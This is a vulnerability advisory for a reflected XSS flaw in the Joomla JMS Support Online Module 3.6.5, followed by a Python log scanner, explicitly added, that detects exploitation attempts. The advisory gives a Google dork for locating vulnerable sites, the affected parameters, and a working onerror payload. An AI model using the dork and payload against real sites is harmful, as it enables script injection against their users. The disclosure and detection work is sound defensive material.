Joomla JMS Support Online Module component version 3.6.5 suffers from a cross-site scripting vulnerability.
eae018801eae842408a2605b94fdd00002efad9133ce39cb1a797bdf86ac7fdd
Exploit Title : Joomla JMS Support Online Module Reflected XSS - skype extension
Google Dork : inurl:sendmessage.php?type=skype
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : https://www.joommasters.com
Version: 3.6.5
Type : webapps
Platform: Joomla
------------------------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/sendmessage.php
Vulnerable Parameters: ?type=skype&user=<vulnerable>&skype=<vulnerable>
Method: GET
Payload: "><img src=i onerror=prompt(2)>
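
Detection example (added here, not part of the original advisory or the vendor's code): a log check that flags GET requests to sendmessage.php with type=skype whose user or skype parameter carries markup characters, including double-encoded ones. It assumes a combined-format web server access log; the "/site" path and all sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REFLECTED_PARAMS = ("user", "skype")   # parameters the advisory lists
MARKUP = re.compile(r'[<>"]')          # needed to close an attribute and open a tag
REQUEST = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+"')  # combined log format

# Constructed sample lines; "/site" stands in for the advisory's [PATH].
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2018:10:00:01 +0000] "GET /site/sendmessage.php'
    '?type=skype&user=alice&skype=alice.support HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2018:10:02:13 +0000] "GET /site/sendmessage.php'
    '?type=skype&user=%22%3E%3Cimg%20src%3Di%3E&skype=x HTTP/1.1" 200 530',
    '192.0.2.78 - - [01/Jan/2018:10:03:40 +0000] "GET /site/sendmessage.php'
    '?type=skype&user=bob&skype=%2522%253E%253Cimg%253E HTTP/1.1" 200 530',
    '192.0.2.10 - - [01/Jan/2018:10:05:02 +0000] "GET /site/index.php'
    '?user=%3Cb%3E HTTP/1.1" 200 99',
]


def suspicious_params(log_line):
    """Return the reflected parameters in this request that carry markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/sendmessage.php"):
        return []
    query = parse_qs(url.query, keep_blank_values=True)
    if query.get("type") != ["skype"]:
        return []
    # parse_qs decodes once; unquote again to catch double-encoded values
    return [name for name in REFLECTED_PARAMS
            if any(MARKUP.search(v) or MARKUP.search(unquote(v))
                   for v in query.get(name, []))]


def scan(lines):
    """Return (1-based line number, flagged parameters) for each hit."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := suspicious_params(line))]


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: markup in {', '.join(hits)}")
```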